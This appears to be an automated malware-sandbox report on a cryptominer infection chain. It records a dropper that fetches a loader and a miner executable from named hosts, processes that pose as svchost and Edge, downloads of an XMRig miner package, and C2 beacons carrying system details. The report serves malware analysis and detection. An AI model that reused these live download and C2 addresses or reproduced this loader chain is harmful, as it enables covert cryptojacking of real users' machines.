Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_00C2BD60

Source: global traffic	HTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /download/miner2.0.exe HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: eijfrhegrtbrfcd.online
Source: global traffic	DNS traffic detected: DNS query: sanctam.net
Source: global traffic	DNS traffic detected: DNS query: github.com

Source: unknown

Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/System32
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/7737D9ECF5C72AA370644
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&7:
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/dn
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:7.
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB7V
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpER
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpF6Z
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM6
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN7
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpWindows
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedA
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded&
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded3
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodede
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedr
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpr7f
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Local
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ViewSizePreferences.SourceAumid2
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/W
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Wiow
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe%
Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exeh
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ones
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/t
Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ysWOW64
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000357C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: svchost64.exe, 0000006B.00000002.2706597636.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 00000090.00000002.2783114203.0000000003221000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 0000009F.00000002.2836528294.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: sihost64.exe, 0000009F.00000002.2836528294.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: loader_5879465914.exe, 00000007.00000003.2741556491.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2724634660.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2791232817.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2894492934.000000000378D000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2857988717.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2763069351.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2908398363.0000000003788000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2949314469.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2867639993.000000000378E000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3022068193.0000000003799000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2590705590.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2742582676.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2864099579.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2832045972.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/
Source: loader_5879465914.exe, 00000007.00000003.2550392048.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3020183902.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2438846550.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2467127699.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2426102539.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2793911920.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2635393911.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2373865784.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2481291707.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2620255870.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2453484354.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2508746813.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2399949653.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2522344856.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2689820350.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358547789.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2386863025.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2648797169.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2412212318.0000000000778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/0
Source: loader_5879465914.exe, 00000007.00000002.3021798885.0000000003750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/A
Source: Microsoft-Edge.exe, 0000000E.00000002.3022066818.0000000003705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/R
Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.php
Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpe
Source: curl.exe, 0000000A.00000002.2354315506.00000212B53EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2353963310.00000212B53EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpy
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exe
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
Source: curl.exe, 00000052.00000003.2618490481.000001DFDEF7B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619230837.000001DFDEF7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
Source: Microsoft-Edge.exe, 0000000E.00000003.2439702684.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2550111525.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000002.3020533522.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2412607559.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2619479146.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2605563246.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2669985845.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2564142044.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426458006.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2577879379.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
Source: loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003740000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003780000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000359F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
Source: svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sanctam.net:58899
Source: svchost64.exe, 00000095.00000002.2847173181.0000000003510000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
